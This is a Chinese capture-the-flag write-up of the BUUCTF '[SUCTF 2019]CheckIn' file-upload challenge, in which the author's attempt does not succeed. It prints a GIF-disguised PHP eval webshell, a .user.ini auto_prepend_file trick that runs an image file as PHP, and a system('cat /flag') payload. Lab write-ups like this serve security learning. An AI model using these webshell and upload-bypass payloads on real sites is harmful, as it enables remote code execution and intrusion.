106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET['123']);</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
michaelzhouh8 天前
php项目ueditor上传pdf文件,防止XSS攻击
pdf·php·xss·ueditor
wgego10 天前
做题笔记BUU (XSS-Lab)(1-14)
前端·笔记·xss
mooyuan天天10 天前
CTFHub XSS通关:XSS-过滤关键词
xss·关键字过滤·ctfhub·xss漏洞
一袋米扛几楼9810 天前
【软件安全】什么是XSS(Cross-Site Scripting,跨站脚本)?
前端·安全·xss
红树林0720 天前
beef-xss网页无法访问
安全·web安全·xss
xixixi7777721 天前
怎么区分主动攻击和被动攻击啊,为什么跨站脚本是被动攻击?
xss·1024程序员节·跨站脚本·主动攻击·被动攻击
骥龙22 天前
2.6、Web漏洞挖掘实战(下):XSS、文件上传与逻辑漏洞深度解析
前端·xss
-曾牛23 天前
从零到一:XSS靶场 haozi.me 全关卡通关教程(含冷知识汇总)
前端·网络安全·渗透测试·靶场·xss·攻略·靶场教程
无盐海23 天前
XSS漏洞攻击 (跨站脚本攻击)
前端·xss
Forfun_tt23 天前
xss-labs pass-12
前端·xss